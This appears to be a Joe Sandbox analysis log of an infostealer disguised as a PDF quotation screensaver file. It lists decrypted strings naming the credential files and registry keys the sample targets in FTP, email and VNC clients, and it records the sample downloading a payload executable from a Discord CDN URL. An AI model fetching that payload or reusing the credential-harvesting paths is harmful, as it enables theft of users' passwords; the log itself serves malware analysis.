                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: WinSCP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ABCDEF
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Flash FXP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: port
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: user
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pass
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: quick.dat
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Sites.dat
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FlashFXP\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FlashFXP\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FTP Navigator
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SystemDrive
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FTP Navigator\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: No Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: User
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SmartFTP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: WS_FTP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: appdata
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HOST
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PWD=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PWD=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FtpCommander
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SystemDrive
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SystemDrive
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SystemDrive
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \cftp\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Password=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;User=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Server=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Port=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Port=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Password=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;User=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ;Anonymous=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FTPGetter
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FTPGetter\servers.xml
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_ip>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_ip>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </server_ip>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_port>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </server_port>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_user_name>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_user_name>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </server_user_name>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_user_password>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <server_user_password>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </server_user_password>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FTPGetter
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: The Bat!
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: appdata
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \The Bat!
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Account.CFN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Account.CFN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Becky!
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: DataDir
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Folder.lst
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Mailbox.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Account
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PassWd
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Account
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTPServer
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Account
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: MailAddress
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Becky!
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Outlook
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IMAP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: POP3 Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HTTP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IMAP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: POP3 Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HTTP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTP Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Mail App
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SchemaId
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pResourceElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pIdentityElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pPackageSid
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: syncpassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: mailoutgoing
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FoxMail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Executable
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FoxmailPath
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Storage\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Storage\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Account.stg
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Account.stg
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: POP3Host
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTPHost
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IncomingServer
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Account
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: MailAddress
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: POP3Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Opera Mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: opera:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PocoMail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: appdata
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Pocomail\accounts.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: POPPass
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTPPass
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SMTP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: eM Client
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: eM Client\accounts.dat
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: eM Client
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Accounts
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: "Username":"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: "Secret":"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: "ProviderName":"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: o6806642kbM7c5
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Mailbird
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SenderIdentities
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Accounts
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Mailbird\Store\Store.db
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Server_Host
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Accounts
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Email
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Username
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: EncryptedPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Mailbird
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: RealVNC 4.x
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: RealVNC 3.x
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: RealVNC 4.x
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: RealVNC 3.x
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\ORL\WinVNC3
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: TightVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: TightVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PasswordViewOnly
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: TightVNC ControlPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ControlPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: TigerVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\TigerVNC\Server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd2
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd2
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd2
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UltraVNC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passwd2
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: JDownloader 2.0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49739 version: TLS 1.2
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                      Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
                      Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Sep 2023 16:56:19 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 233Connection: closeCF-Ray: 80935c801e2e0f70-EWRCF-Cache-Status: EXPIREDCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Wed, 18 Sep 2024 16:56:19 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ADPycdttIlLS4DZPGnjapuaH4IH3h668kquNljQgZPe-fWubTgvAhUkGio3FmEEev5-vR5BdzhXy8itN-sa7_uEXH7GJbQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0RkfxpWOthSR_M4WX33SHnxwmq.PBBz9w0zzi7FHLsg-1695142579-0-AbG8MuU4t6NFaTnWZGcHy6rJMbIrxRbtsDbFI2DYzZgwas/LDld+g9kZ0Nn+nm46+7YCJcqPskzXzbnlxNokCb4=; path=/; expires=Tue, 19-Sep-23 17:26:19 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BVW9qS5olmBj5R6Wb%2BCqDqCDRUwHQy%2FmOBfXJJf5%2BA8ozfXJWPynWbtxvILTsSuLa9ycp9uR2KzoHr2ZzAOSX7wp3cbuwl3cEK2Lt341mSp1M4jseh03HjHOulGoipmwrvFLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordap
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A66000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Reh
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                      Source: AppLaunch.exe, 0000000B.00000002.572594634.0000000009D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                      Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordappD
                      Source: AppLaunch.exe, 0000000B.00000002.572215304.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://di.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
